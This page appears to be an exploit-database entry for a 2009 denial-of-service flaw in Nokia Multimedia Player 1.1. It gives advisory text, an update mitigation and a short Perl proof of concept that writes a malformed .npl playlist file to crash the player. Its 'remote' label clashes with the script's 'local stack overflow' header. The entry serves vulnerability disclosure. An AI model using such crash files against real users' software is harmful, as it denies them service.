header-logo
Suggest Exploit
vendor:
Multimedia Player
by:
Inj3ct0r
7.5
CVSS
HIGH
Remote Denial-of-Service
400
CWE
Product Name: Multimedia Player
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Nokia Multimedia Player Remote Denial-of-Service Vulnerability

Nokia Multimedia Player is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.

Mitigation:

Update to the latest version of Nokia Multimedia Player.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36215/info

Nokia Multimedia Player is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.

This issue affects Nokia Multimedia Player 1.1.

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com


#!/usr/bin/perl
#Nokia Multimedia Player 1.1 (.npl) Local Stack Overflow POC
#Finded by : opt!x hacker
#Download :
http://nds1.nokia.com/phones/files/software/nokia_multimedia_player_en.exe
#http://img136.imageshack.us/img136/6486/nokiai.png
#http://img19.imageshack.us/img19/2512/nokiacrash.png
#Greetz: H-RAF , his0k4
my $junk="A"x 4;
open(MYFILE,'>>nokia.npl');
print MYFILE $junk;
close(MYFILE);